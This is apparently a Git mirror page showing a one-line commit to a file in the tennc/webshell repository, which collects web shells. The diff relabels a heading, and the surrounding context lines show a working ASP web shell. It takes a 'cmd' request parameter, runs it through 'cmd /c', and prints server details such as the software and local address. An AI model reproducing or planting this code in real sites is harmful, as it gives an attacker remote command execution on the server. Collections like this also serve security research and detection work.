mirror of
https://github.com/tennc/webshell
synced 2024-11-10 13:44:18 +00:00
commit
e9b09f671b
1 changed files with 1 additions and 1 deletions
|
@ -39,7 +39,7 @@ end Function
|
|||
<%Response.Write(Request.ServerVariables("server_software"))%>
|
||||
</p>
|
||||
<p>
|
||||
<b>The server's software:</b>
|
||||
<b>The server's local address:</b>
|
||||
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
|
||||
<% szCMD = request("cmd")
|
||||
thisDir = getCommandOutput("cmd /c" & szCMD)
|
||||
|
|
Loading…
Reference in a new issue